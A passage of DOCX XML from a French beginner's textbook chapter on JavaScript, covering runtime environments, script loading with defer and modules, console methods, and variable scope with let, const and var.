        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 30 · Niveau : Débutant · Prérequis : chapitre 23</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Exécuter du JavaScript dans le navigateur et dans Node.js.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Inclure un script sans bloquer le rendu.</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Utiliser la console comme outil de travail.</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Comprendre la portée, le mode strict et les modules.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Éviter les pièges de la conversion implicite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>24.1 Où s'exécute JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JavaScript est un langage standardisé (ECMAScript) exécuté par un moteur : V8 dans Chrome et Node.js, SpiderMonkey dans Firefox, JavaScriptCore dans Safari. Le langage est le même ; l'environnement diffère.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.76 — Quatre environnements et leurs capacités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29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Environnement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Accès disponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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Absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Navigateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DOM, fenêtre, stockage, réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Système de fichiers direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Fichiers, processus, réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2295"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service worker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache, interception réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2950"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="229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Deno / Bun</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Fichiers, réseau, permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="295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DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Premières manipulations dans la console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Dans la console du navigateur</w:t>
        <w:br/>
        <w:t>2 + 3                        // 5</w:t>
        <w:br/>
        <w:t>"Bonjour" + " " + "Web"      // "Bonjour Web"</w:t>
        <w:br/>
        <w:t>document.title               // le titre de la page</w:t>
        <w:br/>
        <w:t>localStorage.setItem("a", 1) // stockage local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La console est un espace d'expérimentation : elle exécute n'importe quelle expression et affiche les erreurs. C'est l'outil le plus utilisé au quotidien, bien avant le débogueur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>24.2 Inclure un script dans une page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Trois emplacements existent, mais un seul est recommandé : un fichier externe chargé avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou déclaré comme module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre façons de charger du JavaScript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 Recommandé : différé, ordre préservé --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script src="js/app.js" defer&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Recommandé : module, différé par défaut --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script type="module" src="js/app.js"&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Déconseillé : bloque l'analyse du document --&gt;</w:t>
        <w:br/>
        <w:t>&lt;script src="js/app.js"&gt;&lt;/script&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- À proscrire : code mêlé au HTML --&gt;</w:t>
        <w:br/>
        <w:t>&lt;button onclick="alert('clic')"&gt;Cliquer&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.77 — Quatre formes de chargement et leur portée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2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Forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Immédiate, bloquante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Globale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Particularités</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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&lt;script defer&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Après l'analyse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Globale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Sites classiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;script type=module&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Après l'analyse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code moderne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="221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import</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> dynamique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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À la demande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Chargement différé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un module possède sa propre portée : les variables ne polluent pas l'objet global, et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> structurent le code. C'est le mode à privilégier dès qu'un script dépasse quelques lignes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux modules qui communiquent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js/math.js</w:t>
        <w:br/>
        <w:t>export function additionner(a, b) { return a + b; }</w:t>
        <w:br/>
        <w:t>export const PI = 3.14159;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// js/app.js</w:t>
        <w:br/>
        <w:t>import { additionner, PI } from "./math.js";</w:t>
        <w:br/>
        <w:t>console.log(additionner(2, 3), PI);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>24.3 La console, un outil de travail</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>console.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est que la pointe de l'outil. Cinq méthodes couvrent des besoins distincts, et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>console.table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> transforme un tableau d'objets en tableau lisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq méthodes de console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console.log("Valeur :", 42);</w:t>
        <w:br/>
        <w:t>console.warn("Ceci est un avertissement");</w:t>
        <w:br/>
        <w:t>console.error("Ceci est une erreur");</w:t>
        <w:br/>
        <w:t>console.table([</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Ada", annee: 1815 },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Grace", annee: 1906 },</w:t>
        <w:br/>
        <w:t>]);</w:t>
        <w:br/>
        <w:t>console.time("boucle");</w:t>
        <w:br/>
        <w:t>for (let i = 0; i &lt; 100000; i++) {}</w:t>
        <w:br/>
        <w:t>console.timeEnd("boucle");   // boucle: 1.2ms</w:t>
      </w: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DÉBOGUER SANS `CONSOLE.LOG`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un point d'arrêt dans le panneau Sources permet d'inspecter les variables à un instant précis, de rejouer une fonction et de suivre la pile d'appels. C'est plus efficace qu'une succession d'affichages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>24.4 Variables et portée</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remplacent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> depuis 2015. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la réaffectation de la liaison, pas la modification de l'objet référencé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`let`, `const`, `var` : trois comportements différents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const nom = "Ada";          // liaison constante</w:t>
        <w:br/>
        <w:t>let compteur = 0;          // liaison réaffectable</w:t>
        <w:br/>
        <w:t>compteur += 1;             // OK</w:t>
        <w:br/>
        <w:br/>
        <w:t>const personne = { nom: "Ada" };</w:t>
        <w:br/>
        <w:t>personne.nom = "Grace";   // OK : l'objet est modifié</w:t>
        <w:br/>
        <w:t>// personne = {};         // Erreur : la liaison est constante</w:t>
        <w:br/>
        <w:br/>
        <w:t>// var : portée de fonction, hissage — à éviter</w:t>
        <w:br/>
        <w:t>if (true) { var x = 1; }</w:t>
        <w:br/>
        <w:t>console.log(x);            // 1</w:t>
        <w:br/>
        <w:br/>
        <w:t>// let : portée de bloc</w:t>
        <w:br/>
        <w:t>if (true) { let y = 1; }</w:t>
        <w:br/>
        <w:t>// console.log(y);         // ReferenceError</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HISSAGE (HOISTING)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
